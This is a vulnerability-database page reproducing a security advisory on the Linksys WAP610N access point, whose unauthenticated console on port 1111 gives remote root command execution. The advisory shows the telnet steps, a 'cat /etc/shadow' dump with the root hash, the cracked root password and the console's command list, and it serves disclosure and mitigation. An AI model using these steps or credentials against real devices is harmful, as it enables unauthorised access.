Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linksys WAP610N Unauthenticated Root Access Security Vulnerability

🗓️ 10 Feb 2011 00:00:00Reported by Matteo IgnaccoloType 
zdt
 zdt🔗 0day.today👁 28 Views

Linksys WAP610N Unauthenticated Root Access Security Vulnerability in 802.11n draf

Code
Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo () securenetwork it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL:
http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt
 
 
*** SUMMARY ***
 
Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
 
Unauthenticated remote textual administration console has been found that
allow an attacker to run system command as root user.
 
 
*** VULNERABILITY DETAILS ***
 
telnet <access-point IP> 1111
 
Command> system id
Output>  uid=0(root) gid=0(root)
 
Coomand> system cat /etc/shadow
Ouptup>  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup>  bin:*:10933:0:99999:7:::
Ouptup>  daemon:*:10933:0:99999:7:::
Ouptup>  adm:*:10933:0:99999:7:::
Ouptup>  lp:*:10933:0:99999:7:::
Ouptup>  sync:*:10933:0:99999:7:::
Ouptup>  shutdown:*:10933:0:99999:7:::
Ouptup>  halt:*:10933:0:99999:7:::
Ouptup>  uucp:*:10933
 
root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)
 
List of console's command:
 
ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ      
HYP_WRITE     
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER
 
 
*** EXPLOIT ***
 
Attackers may exploit these issues through a common telnet client as explained
above.
 
 
*** FIX INFORMATION ***
 
No patch is available.
 
*** WORKAROUNDS ***
 
Put access points on separate wired network and filter network traffic to/from
1111 tcp port.
 


#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Feb 2011 00:00Current
7.1High risk
Vulners AI Score7.1
linksys wap610nunauthenticated accessroot privilegesfirmware version 1.0.01remotematteo ignaccolovulnerabilitytelnetcommand executionmdcracksecurity advisorynetwork traffic filtering
28